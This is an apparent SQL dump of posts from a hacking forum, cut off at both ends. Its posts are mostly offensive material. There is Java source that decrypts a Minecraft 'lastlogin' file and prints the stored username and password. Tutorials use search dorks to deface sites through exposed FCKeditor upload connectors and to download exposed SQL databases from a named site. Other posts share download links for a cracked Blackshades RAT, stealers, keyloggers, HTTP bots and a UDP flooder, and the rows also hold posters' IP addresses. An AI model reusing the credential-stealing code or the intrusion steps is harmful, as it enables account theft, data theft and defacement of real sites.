DataInputStream(new CipherInputStream(new FileInputStream(lastLogin), cipher));\r\n else {\r\n dis = new DataInputStream(new FileInputStream(lastLogin));\r\n }\r\n user = dis.readUTF();\r\n pass = dis.readUTF();\r\n dis.close();\r\n } catch (Exception e) {\r\n e.printStackTrace();\r\n }\r\n }\r\nprivate Cipher getCipher(int mode, String password) throws Exception {\r\n Random random = new Random(43287234L);\r\n byte[] salt = new byte[8];\r\n random.nextBytes(salt);\r\n PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);\r\n\r\n SecretKey pbeKey = SecretKeyFactory.getInstance(\"PBEWithMD5AndDES\").generateSecret(new PBEKeySpec(password.toCharArray()));\r\n Cipher cipher = Cipher.getInstance(\"PBEWithMD5AndDES\");\r\n cipher.init(mode, pbeKey, pbeParamSpec);\r\n return cipher;\r\n }\r\n\r\n}[/code]', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', '241f30d0ecdeafa5a0829871f8af4abe', '0', '0'); INSERT INTO mybb_posts VALUES('354', '137', '0', '13', '[TuT] How to exploit a vulnerable site', '0', '54', 'Sin Cara', '1345183925', '[color=#DAA520][b]Note:[/b][/color] Credits to original author. I just shared it.\r\n\r\n[b][color=#1E90FF][size=6]How to exploit a vulnerable site[/size][/color][/b]\r\n\r\n[b][size=5][color=#1E90FF]What is this?[/color][/size][/b]\r\n\r\nThis is a tutorial showing you how to exploit vulnerable sites. If you continue to read on, I suggest using this tutorial for educational purposes only.\r\n\r\n\r\n[color=#1E90FF][b]Lets get started[/b][/color]\r\n\r\nFirst you need to find a vulnerable site. You may say how do I find these vulnerable sites, well first off go to google.com and type in\r\n\r\n[spoiler][quote]admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html[/quote][/spoiler]\r\n\r\n\r\n\r\nOnce you find a site that looks like this\r\n\r\n[IMG]http://i46.tinypic.com/2jb4px2.jpg[/IMG]\r\n\r\n\r\nWhere it says Connector change ASP to PHP\r\n\r\n\r\n[b][color=#1E90FF][size=5]Download[/size][/color][/b]\r\n\r\nNow next, download Horny Monkeys Deface Builder\r\n\r\n[spoiler]HMDB - http://www.mediafire.com/?wozc676q35eoby5[/spoiler]\r\n\r\nVirus Total - https://www.virustotal.com/file/580f4198bbb4cca8a5979f108a46392338c8f246e31bffae595d6c9e02550367/analysis/1337460492/\r\n\r\nOnce you have downloaded that Open it up, and Enter what you would like it to do.\r\n\r\n[IMG]http://i45.tinypic.com/2q83g2w.png[/IMG]\r\n\r\nOnce you have done that, click \"Build\" then the HTML code to the right Highlight it and press ctrl + c to copy it. Once you have copied it paste it in notepad and save it as \"anything.html\" to your desktop.\r\n\r\n[b][size=5][color=#1E90FF]Time To Test Everything Out Now[/color][/size][/b]\r\n\r\nGo here - www.example.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html\r\n\r\nOnce you get there change ASP to PHP. Click choose file and open the html file that you saved to your desktop. Now click upload. Once it\'s done, go to the site name then put the name of your file at the end of it\r\n\r\n[spoiler]Example - http://www.example.com/localinjected.html[/spoiler]\r\n\r\n\r\nNow your done :)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', '633ce2c8569d12d81c59633915917fae', '0', '0'); INSERT INTO mybb_posts VALUES('355', '138', '0', '35', 'Make Cool Logo in just 20 sec....[HOT]', '0', '54', 'Sin Cara', '1345184294', '[color=#800080][b]hi ![/b][/color]\r\n\r\n[color=#FF1493][b]I just found a site on which you can make a cool logo for free...........[/b][/color]\r\n\r\n[url=http://adfoc.us/136522138601]http://supalogo.com/[/url]\r\n\r\nI hope it will work for you!!!!', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', 'ee91a5db41cad982e0147dcb89082aca', '0', '0'); INSERT INTO mybb_posts VALUES('356', '139', '0', '12', 'Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345185208', '[b][color=#ff0000]1.[/color] Download [url=http://anchorfree.com/downloads/hotspot-shield/]Hotspotshield[/url] .\r\n[color=#ff0000]2.[/color] Switch On/Connect Hotspotshield.\r\n[color=#ff0000]3.[/color] Go to this link: http://skype.hotspotshield.com/banner.php\r\n[color=#ff0000]4.[/color] Click on \"Get Free Voucher Now\"\r\n[color=#ff0000]5.[/color] Copy the voucher code.\r\n[color=#ff0000]6.[/color] Sign in to your skype account using the link provided under the voucher code.\r\n[color=#ff0000]7.[/color] Enter the code and redeem it.\r\n[/b]\r\n[color=#00ff00][b]This tutorial has been made by VirtualHacker on HF.[/b][/color]', '119.154.22.176', '2006587056', '1', '0', '54', '1345185233', '1', '2c72eef9a12e6b272fe49749e36e335e', '0', '1345185233'); INSERT INTO mybb_posts VALUES('357', '140', '0', '19', '[Junk]???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '54', 'Sin Cara', '1345186318', '[align=center][color=#808000][u][size=medium][b]-:Title: [/b][/size][/u][/color][/align]\n\n[align=center]Earn 40$-60$ per day by doing a very simple work.[/align]\n\n[align=center][color=#808000][size=medium][u][b]-:Description:-[/b][/u][/size][/color][/align]\n\n[align=center]This guide not contains:\n\n[b]Selling/Buying\nFilling Surveys\nPPD\nPTC[/b][/align]\n[align=center][color=#808000][size=medium][u][b]-:Pages:-[/b][/u][/size][/color][/align]\n\n[align=center]14[/align]\n\n[align=center][color=#808000][size=medium][u][b]-:Author:-[/b][/u][/size][/color][/align]\n[align=center]Realhack3r(SinCara)[/align]\n\n[align=center][color=#808000][size=medium][u][b]-:Copies Available:-[/b][/u][/size][/color][/align]\n\n[align=center]Unlimited [/align]\n\n[align=center][color=#808000][size=medium][u][b]-:Reseller Rights:-[/b][/u][/size][/color][/align]\n\n[align=center]No..![/align]\n\n[align=center][color=#808000][size=medium][u][b]-:Price:-[/b][/u][/size][/color][/align]\n\n[align=center]10$[/align]\n\n[align=center][color=#808000][size=medium][u][b]-:Payment Method:-[/b][/u][/size][/color][/align]\n\n[align=center]Liberty Reserve[/align]\n\n[align=center][color=#808000][size=medium][u][b]-:Vouches:-[/b][/u][/size][/color][/align]\n\nCurrently none available. \n[align=center][color=#DAA520][b]Note :[/b][/color] No Vouch Copy except [color=#FF0000]t3h jok3r[/color][/align]', '119.154.22.176', '2006587056', '1', '0', '1', '1345419572', '1', '55e897c5238a519982bd50fed160750e', '0', '1345419572'); INSERT INTO mybb_posts VALUES('443', '140', '357', '19', 'RE: ???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '1', 't3h jok3r', '1345419603', 'Firstly, I fixed my username from t3j joker to t3h jok3r.\n\nSecondly, I\'ll take a vouch copy and off site vouches are not allowed.', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', '7f3ff935ca86015124fafe72debcdb48', '0', '0'); INSERT INTO mybb_posts VALUES('444', '147', '439', '42', 'RE: [Hacker news] BOTNET -The hacker news magazine', '0', '61', 'NXK', '1345420482', '[quote=\'spacefish36\' pid=\'439\' dateline=\'1345417799\']\r\nIf their next conference is held in USA, then I would definitely go to the conference other wise not. What about you NXK?\r\n[/quote]\r\n\r\nI\'m canadian but id love to take a trip and check it out.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '1d7eb46f6b25ca415169a19331fd6788', '0', '0'); INSERT INTO mybb_posts VALUES('445', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '1', 't3h jok3r', '1345421278', 'True, well according to me it\'s all good news. I might be sound rude but I\'m not being rude, it\'s just he never was active from day one. Even if I\'m away, Apathy was there and helped me out no matter what. He is a true friend and I\'m happy to hire someone new because they will actually prove it to LH that they are active and will do their best to make LH more popular. I hope I find the right person, I got a suggestion from someone and gave them a task to help me with and they doing pretty good.', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', 'd3d302108693e4161487312bca45eddf', '0', '0'); INSERT INTO mybb_posts VALUES('446', '134', '341', '47', 'RE: Win $10 for referring people', '0', '1', 't3h jok3r', '1345421400', 'Good Luck! Even if you are a admin, you can participate in this contest.', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', '1ae624b37cbf42eba4eb50a0986db972', '0', '0'); INSERT INTO mybb_posts VALUES('447', '152', '400', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '1', 't3h jok3r', '1345421614', 'Lol I had the virus scan part on bold to let you know that you need to have a virus scan. Why can\'t it have a virus scan?', '41.174.60.45', '699284525', '1', '0', '1', '1345421626', '1', '16ace483117f091ca8b06a2ebe47d695', '0', '1345421626'); INSERT INTO mybb_posts VALUES('448', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '4', 'Triple H', '1345421897', 'Is there a download link for the monkeys deface builder?', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', '5523f6dcf77855ec734e689f53205fd1', '0', '0'); INSERT INTO mybb_posts VALUES('449', '156', '0', '13', '[tut]View/Download SQL DB', '0', '4', 'Triple H', '1345422231', 'Article Author: DnSsTuf\r\n\r\nDork For Search :\r\nCode:\r\n\r\ninurl:/\'\'bigdump.php\'\'\r\nintitle:BigDump ver. 0.29b\r\n\r\n\r\nHow To Use It :\r\n\r\n1st You need To Search This Dorks on Google Or Other Search Engine..\r\n\r\nNow We Got This Site For Example...\r\n\r\n\r\nCode:\r\nhttp://bitterrivals.org/dump/bigdump.php\r\nNow There iz Showing An Database File..\r\n\r\n\r\nCode:\r\nbrprof_phpbb3_users2.sql\r\n\r\n\r\nNow To Get DataBase Ov Website You Need To Delete This From Link And Add The Database Name there... Like This..\r\n\r\n\r\nCode:\r\nhttp://bitterrivals.org/dump/bigdump.php\r\n\r\n\r\nCode:\r\nhttp://bitterrivals.org/dump/brprof_phpbb3_users2.sql', '41.174.60.45', '699284525', '1', '0', '0', '0', '1', 'c08d7a31634755a1e472047ef723ee3c', '0', '0'); INSERT INTO mybb_posts VALUES('358', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '1', 't3h jok3r', '1345209613', 'No problem. Good Luck bro, BTW I have a small job for you. I will PM you about it later on today.', '41.174.23.65', '699275073', '1', '0', '0', '0', '1', '1371cf0383efa5f49e31a9312d2a88e2', '0', '0'); INSERT INTO mybb_posts VALUES('359', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345217304', 'Thanks :) .', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '27e4f6134c4f452420aa079c19f8a3d4', '0', '0'); INSERT INTO mybb_posts VALUES('360', '31', '86', '7', 'RE: How long are you online daily?', '0', '54', 'Sin Cara', '1345218103', 'hmmmmmmmmm...... i online about 4-6 hours daily :)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '39b07a1a146c6014cda8ae91c4006910', '0', '0'); INSERT INTO mybb_posts VALUES('361', '140', '357', '19', 'RE: ???[Ebook] Earn 40$-60$ per day by doing a very simple job [Highly Vouched]???', '0', '2', 'Apathy', '1345220131', 'Could I get the vouch copy? Me and the joker are BFF.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'a0e97c200c0c6b4e6d62cc81a3b84c06', '0', '0'); INSERT INTO mybb_posts VALUES('362', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '2', 'Apathy', '1345220233', 'Nice tutorial thanks.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'e77a85bad076036b349ca9217d5e47d9', '0', '0'); INSERT INTO mybb_posts VALUES('363', '136', '353', '53', 'RE: [Java] Minecraft Lastlogin Decrypter [Source]', '0', '2', 'Apathy', '1345220274', 'So how would I use this?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '1c6d782186badb0cc807be1e6eb320cf', '0', '0'); INSERT INTO mybb_posts VALUES('364', '136', '353', '53', 'RE: [Java] Minecraft Lastlogin Decrypter [Source]', '0', '67', 'HoverCatz', '1345220699', 'Hey. There was something wrong with the code, so i fixed it :)\r\nHere is a download to test it directly: [url=https://dl.dropbox.com/u/33062220/LastLogin%20decrypt.rar]Click Here[/url]\r\n\r\n[code]\r\nimport javax.crypto.*;\r\n\r\nimport java.io.BufferedReader;\r\nimport java.io.DataInputStream;\r\nimport java.io.File;\r\nimport java.io.FileInputStream;\r\nimport java.io.IOException;\r\nimport java.io.InputStreamReader;\r\nimport java.util.*;\r\nimport java.util.logging.Logger;\r\n\r\nimport javax.crypto.spec.*;\r\n\r\npublic class test {\r\n\r\n public static void main(String[] args) {\r\n new test();\r\n }\r\n\r\n public String user = \"\";\r\n public String pass = \"\";\r\n\r\n public test() {\r\n readUsername();\r\n System.out.println(\"Username: \" + user);\r\n System.out.println(\"Password \" + pass);\r\n }\r\n\r\n private void readUsername() {\r\n try {\r\n File lastLogin = new File(getAppData() + \"\\\\.minecraft\\\\lastlogin\");\r\n Cipher cipher = getCipher(2, \"passwordfile\");\r\n DataInputStream dis;\r\n if (cipher != null)\r\n dis = new DataInputStream(new CipherInputStream(\r\n new FileInputStream(lastLogin), cipher));\r\n else {\r\n dis = new DataInputStream(new FileInputStream(lastLogin));\r\n }\r\n user = dis.readUTF();\r\n pass = dis.readUTF();\r\n dis.close();\r\n } catch (Exception e) {\r\n e.printStackTrace();\r\n }\r\n }\r\n\r\n private Cipher getCipher(int mode, String password) throws Exception {\r\n Random random = new Random(43287234L);\r\n byte[] salt = new byte[8];\r\n random.nextBytes(salt);\r\n PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);\r\n\r\n SecretKey pbeKey = SecretKeyFactory.getInstance(\"PBEWithMD5AndDES\")\r\n .generateSecret(new PBEKeySpec(password.toCharArray()));\r\n Cipher cipher = Cipher.getInstance(\"PBEWithMD5AndDES\");\r\n cipher.init(mode, pbeKey, pbeParamSpec);\r\n return cipher;\r\n }\r\n \r\n private static File getAppData() {\r\n ProcessBuilder builder = new ProcessBuilder(new String[]{\"cmd\", \"/C echo %APPDATA%\"});\r\n\r\n BufferedReader br = null;\r\n try {\r\n Process start = builder.start();\r\n br = new BufferedReader(new InputStreamReader(start.getInputStream()));\r\n String path = br.readLine();\r\n // TODO HACK do not know why but I get an extra \'\"\' at the end\r\n if(path.endsWith(\"\\\"\")){\r\n path = path.substring(0, path.length()-1);\r\n }\r\n return new File(path.trim());\r\n\r\n\r\n } catch (IOException ex) {\r\n System.out.println(\"Cannot get Application Data Folder\");\r\n } finally {\r\n if(br != null){\r\n try {\r\n br.close();\r\n } catch (IOException ex) {\r\n System.out.println(\"Error: \" + ex.getMessage());\r\n }\r\n }\r\n }\r\n\r\n return null;\r\n }\r\n \r\n}\r\n[/code]', '85.165.36.95', '1436886111', '1', '0', '67', '1345221060', '1', '0333d857efbf9812bf8977da92b51533', '0', '1345221060'); INSERT INTO mybb_posts VALUES('365', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '67', 'HoverCatz', '1345222852', 'Nice, this rocks! :D .', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '4f533ac2ee1cb8c1dcb2bc93b2d7b037', '0', '0'); INSERT INTO mybb_posts VALUES('366', '121', '302', '21', 'RE: kurosaki\'s DOS Tool', '0', '67', 'HoverCatz', '1345223098', 'Error :|\r\n\r\n[code]Fatal error: Call to undefined function curl_init() in C:\\xampp\\htdocs\\mydos.php(2) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(3) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code(1) : eval()\'d code on line 1[/code]', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'e84c180cc0cd7eb0e2b8300f20c92e75', '0', '0'); INSERT INTO mybb_posts VALUES('367', '122', '304', '24', 'RE: [tut] Increase your virtual RAM', '0', '67', 'HoverCatz', '1345223197', 'My maximum is 8GB. What should i use?', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'fba77f82b4364cfd0ac5d21253c5294f', '0', '0'); INSERT INTO mybb_posts VALUES('368', '141', '0', '9', '$30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '19', '60', 'Linux', '1345224075', '[b][color=#1E90FF][size=xx-large][size=x-large][align=center][url=http://goo.gl/BjBcb]Topline[/url]\r\n[/align][/size][/size][/color][/b]\r\n\r\n[color=#32CD32]\r\nJust though I’d tell you about [url=http://goo.gl/BjBcb]Topline[/url]. It’s a simple add-on that you download and it changes all ads on the sites you visit, into their own ads.\r\nThey therefore pay you. For every 1000 ads you see, you get $0.75. This means you are getting money for free as you browse!!\r\n\r\n\r\n[color=#00BFFF][size=x-large][align=center]How to make more money?(Autopilot)[/align][/size][/color]\r\n\r\nYou can open multiple tabs and simply refresh the page repeatedly to earn more points. You can also download a auto-refresher. This means you can auto-refresh all the tabs (or just the ones you select to be refreshed) on your web browser, whilst you\'re asleep, away or simply browsing HF. The link for the auto-refresher will be at the bottom of this thread![/color]\r\n\r\nRegister here: http://goo.gl/BjBcb\r\n\r\nChrome Auto refresher: http://www.chromeextensions.org/utilities/auto-reload/\r\n\r\nFirefox Auto refresher: https://addons.mozilla.org/en-US/firefox/addon/reloadevery/', '117.217.209.184', '1977209272', '0', '0', '0', '0', '1', '84c6bfc8a7c8b1d5d6cc73b9a01e3efd', '0', '0'); INSERT INTO mybb_posts VALUES('369', '142', '0', '30', 'Blackshades RAT 5.0 Cracked', '19', '60', 'Linux', '1345224837', '[size=x-large][b][align=center]Blackshades RAT 5.0 Cracked.[/align][/b][/size]\r\n\r\n[align=center][img]http://i.minus.com/i1HilLgDXrByp.PNG[/img][/align]\r\n\r\nBlackshades Remote Controller is a Remote Administration Application which allows a user to control several clients from around the world.\r\n\r\nNeed to help out a customer who is having trouble setting up a piece of software?\r\n\r\nHave you ever questioned what your spouse, kids or employees have been doing on the computer?\r\nIs your child misusing the internet facility and taking secret chat with the stranger? Are your employees mailing your business data to your competitors?\r\n\r\nBlackshades Remote Controller will enable you to control the client\'s PC as if you were sitting right in front of it, with support for mouse and keyboard input!\r\nYou can also chat with the client while you do so.\r\nGot a Network to manage? With Blackshades Remote Controller you can connect to unlimited systems, and administer them collectively or individually.\r\n\r\nYou can transfer files between systems, view all the screens of the systems simultaneously and perform maintenance actions.\r\nSend a message to all of them with one click, chat with the systems, run commands via the remote command prompt...there\'s a huge range of functions suited for network management.\r\n\r\nBlackshades Remote Controller also provides as an efficient way of turning your machine into a surveillance/spy-device or to spy on a specific system.\r\nIf you want to monitor all keystrokes on your computer while you are away, or want to make sure your child is being safe while using the computer, the built in tools such as the keystroke capturer, screen viewer and process manager will aid you to do so.\r\n\r\nThis tool has no dependencies (.NET Framework, java, etc) and works extremely well and stable.\r\nBlackshades Remote Controller will let you remotely control your machines, while giving you complete peace of mind.\r\nUsing this tool will allow you to do anything between controlling software and hardware.\r\nCustomers also get free support, and ability to instantly communicate with other members.\r\n\r\n[size=large][b]With Blackshades Remote Controller you can:[/b][/size]\r\n\r\n- Control several computers at once, performing tasks ranging from viewing their screens to uploading/downloading files from them\r\n- Perform maintenance on a Network\r\n- Help a client out by using the screen capture feature, even if they are on the other side of the world\r\n- Monitor a specific PC, recording the keystrokes and remotely managing the files\r\n- Access your computer that you have at home if you are on holiday\r\n- Monitor the computers of students and their activity while teaching a computing lesson\r\n- Chat with clients that you are connected to\r\n\r\n[size=small][b]Disclaimer:[/b]\r\n- This is for study purpose only.\r\n- I\'m not responsible for anything you do with this RAT.[/size]\r\n\r\n\r\n[size=x-large][b]Download Link:[/b][/size] https://dl.dropbox.com/u/53499237/BlackShades%205.0.rar\r\n\r\nIf you need any help or assistance PM me.', '117.217.209.184', '1977209272', '0', '0', '0', '0', '1', '7d450b1cc3d5086d716a29ffe3be81cd', '0', '0'); INSERT INTO mybb_posts VALUES('370', '142', '369', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '67', 'HoverCatz', '1345225945', 'Virustotal? .', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'bed4797442b88b95f1162508684895b0', '0', '0'); INSERT INTO mybb_posts VALUES('371', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '61', 'NXK', '1345231335', 'Definatly use that theme, Looks amazing.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '322b12de1d8622195918f36652f79467', '0', '0'); INSERT INTO mybb_posts VALUES('372', '143', '0', '21', 'Tiny flood', '0', '61', 'NXK', '1345231616', 'Tiny flood is just a simple UDP flooder I made with c#\r\n\r\n*features [Theres lots... kidding]\r\n\r\n-Ip/port select, that\'s it. Simpler is better IMO.\r\n\r\n[img]http://picsend.net/images/151071tinyfloo.png[/img]\r\nDownload: http://www.mediafire.com/?tp76g3wc8d7kvfk\r\nhttps://www.virustotal.com/file/7368d39fa14f141524572742a9a8298dee4e96eaf9b1c6ff8f7f236acc06de28/analysis/1341255034/', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '94b3138157b1b5a401b953cd7dc09157', '0', '0'); INSERT INTO mybb_posts VALUES('373', '144', '0', '21', 'HTTP bot pack [free direct link]', '0', '61', 'NXK', '1345231914', 'Heres a big pack of http bots :)\r\n\r\nI don\'t really wana scan every single builder so Just run the builders in sandboxie they will all work.\r\n[img]http://img805.imageshack.us/img805/8969/bots.png[/img]\r\n\r\n\r\nhttp://www.mediafire.com/?4fbv22j286y98we', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '13e104d8992bc74a7b52982f7ff1c2b7', '0', '0'); INSERT INTO mybb_posts VALUES('374', '145', '0', '30', 'Stealers/Keyloggers', '0', '61', 'NXK', '1345232233', 'Pack of keyloggers/Stealers Iv had for a while.\n\n\n\nIncludes\n\n-Elite Recovery\n-Nova logger\n-POE stealer [really good]\n-Greive logger\n-crime 24 stealer\n\nMost of them have http panels \n[img]http://i.imgur.com/JFfZu.png[/img]\n\n\n[Download]\nhttp://www.mediafire.com/?qbes44s6435jo34\nPassword is \"l33thacker\" without the \"\"\n\nEverything works in sandboxie so if you don\'t trust just go ahead and use that.', '99.253.65.17', '1677541649', '0', '0', '61', '1349026505', '1', '64b511422a231b0530c305d39919d34b', '0', '1349026505'); INSERT INTO mybb_posts VALUES('375', '146', '0', '29', 'se7en sins PREMIUM SECTION', '0', '61', 'NXK', '1345232533', 'Heres the whole se7en sins premium section :) \r\n\r\nTheres ALOT of very good tutorials on here ranging from pretty much everything.. Hacking,Free stuff,Porn,Tutorials... tons.\r\n\r\nhttp://www.mediafire.com/?2dh0je1h7cn5473\r\npassword is \"l33thacker\" with no \"\"', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'fc7a8b8a8aa4b534851b409e601f4af5', '0', '0'); INSERT INTO mybb_posts VALUES('376', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '5', 'Timmy', '1345235538', 'The banner needs to be changed with the new theme though', '173.179.204.156', '-1380725604', '1', '0', '0', '0', '1', 'b2ba8ea131b64e44f3df87e757c81c48', '0', '0'); INSERT INTO mybb_posts VALUES('377', '142', '370', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '1', 't3h jok3r', '1345239830', '[quote=\'HoverCatz\' pid=\'370\' dateline=\'1345225945\']\r\nVirustotal? .\r\n[/quote]\r\n\r\nIt\'s not going to be safe because it\'s a RAT and plus it\'s cracked. So there\'s no use of a scan, however if you have sandbox then open the control panel and check the hidden programs/files in the RAT', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', '5dcfa44d3b44642ef7bd7aa2f8aa7660', '0', '0'); INSERT INTO mybb_posts VALUES('378', '142', '377', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '67', 'HoverCatz', '1345240316', '[quote=\'t3h jok3r\' pid=\'377\' dateline=\'1345239830\']\r\n[quote=\'HoverCatz\' pid=\'370\' dateline=\'1345225945\']\r\nVirustotal? .\r\n[/quote]\r\n\r\nIt\'s not going to be safe because it\'s a RAT and plus it\'s cracked. So there\'s no use of a scan, however if you have sandbox then open the control panel and check the hidden programs/files in the RAT\r\n[/quote]\r\n\r\nAh youre right', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '7f6cdab376b1df04a3e51d96c1c76e9d', '0', '0'); INSERT INTO mybb_posts VALUES('379', '145', '374', '30', 'RE: Stealers/Keyloggers', '0', '1', 't3h jok3r', '1345240470', 'Damn, I believe your computer must be slow as hell. Anyways, nice programs. I always wanted the grieve private crypter.', '41.174.8.52', '699271220', '1', '0', '1', '1345240480', '1', 'f2f2e1ad48d78e9208d4e875c5bc770d', '0', '1345240480'); INSERT INTO mybb_posts VALUES('380', '146', '375', '29', 'RE: se7en sins PREMIUM SECTION', '0', '2', 'Apathy', '1345243405', 'I this the old one or did you rip it?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '15b62a5dbeef5fb9f508fcc8caad1857', '0', '0'); INSERT INTO mybb_posts VALUES('381', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '4', 'Triple H', '1345243664', 'Thanks for the link. Your ebook was worth the survey.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'c0c9f453e7cfea5bc02810a7f6e5dc0c', '0', '0'); INSERT INTO mybb_posts VALUES('382', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '4', 'Triple H', '1345243719', 'I\'m going to give this a try when I go back to USA because there I have a faster internet connection so I can earn more easily.\n\nThanks', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'f70224ab5f0166aa2cbcf4a07bda2e07', '0', '0'); INSERT INTO mybb_posts VALUES('383', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '72', 'Quietus2', '1345244215', 'Can u PM me? I want to download them.', '78.58.52.147', '1312437395', '0', '0', '0', '0', '1', '87ef2c857df7effc040242bae4080ead', '0', '0'); INSERT INTO mybb_posts VALUES('384', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '1', 't3h jok3r', '1345244297', 'Lol I love it when you said it\'s a art. Honestly, I agree with you plus it\'s addicting.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'ce29d34cefa7b33a57ffaf3c48461654', '0', '0'); INSERT INTO mybb_posts VALUES('385', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '1', 't3h jok3r', '1345244424', 'Wow that\'s some unique trick. By the way, where\'s the download to HORNY monkeys deface builder?\n\nJust wondering.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'a3b9210655acf467f3a36c349c898d03', '0', '0'); INSERT INTO mybb_posts VALUES('386', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '1', 't3h jok3r', '1345244498', 'Thanks for the service vladjke.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'b99ba12a3988390d350cee78b3b57a80', '0', '0'); INSERT INTO mybb_posts VALUES('387', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '1', 't3h jok3r', '1345244915', 'Thanks, I don\'t have wifi so can\'t use it. Anyway, thanks for contributing.', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', 'da4c0377b256b123e1cb0c1273dcef66', '0', '0'); INSERT INTO mybb_posts VALUES('388', '146', '380', '29', 'RE: se7en sins PREMIUM SECTION', '0', '61', 'NXK', '1345245421', '[quote=\'Apathy\' pid=\'380\' dateline=\'1345243405\']\r\nI this the old one or did you rip it?\r\n[/quote]\r\n\r\nIt may be the old one, I got it from a friend like 3 months ago. Just thought Id share.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'bc38b70e7e49dedba9296f716d4f5182', '0', '0'); INSERT INTO mybb_posts VALUES('389', '146', '388', '29', 'RE: se7en sins PREMIUM SECTION', '0', '1', 't3h jok3r', '1345245652', '[quote=\'NXK\' pid=\'388\' dateline=\'1345245421\']\r\n[quote=\'Apathy\' pid=\'380\' dateline=\'1345243405\']\r\nI this the old one or did you rip it?\r\n[/quote]\r\n\r\nIt may be the old one, I got it from a friend like 3 months ago. Just thought Id share.\r\n[/quote]\r\nWho cares? At least it has free porn content :D', '41.174.8.52', '699271220', '1', '0', '0', '0', '1', '1b07cd841b563e740acbd039e8202521', '0', '0'); INSERT INTO mybb_posts VALUES('390', '147', '0', '42', '[Hacker news] BOTNET -The hacker news magazine', '0', '61', 'NXK', '1345248954', 'Hello faithful readers and new comers to our magazine! We are very sorry to have missed publishing the July issue, however, we were busy at work putting on the THE HACKERS CONFERENCE in Delhi, India. We had a fantastic turn out and professional, informative speakers. We plan to have another conference on Internet Security in September next year and hope to see you there! For now, enjoy all the good information on Botnets in our August edition and thank you again for your continued support.\r\n\r\nhttp://news.thehackernews.com/THN-August2012.pdf\r\n\r\nSource\r\nhttp://thehackernews.com/2012/08/botnet-hacker-news-magazine-august-2012.html\r\n\r\n\r\n\r\n\r\nMy thought\'s on this topic, Are that this is something very interesting read for people who maintain botnets, own botnets, Spreading whores and install sellers. \r\nIt\'s very detailed and I love all the information Iv actually learned from this. On the origin of botnets things like that. Post a reply on what you though about it!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5f96db5f2857e2b2ce5617b2ca38f7ca', '0', 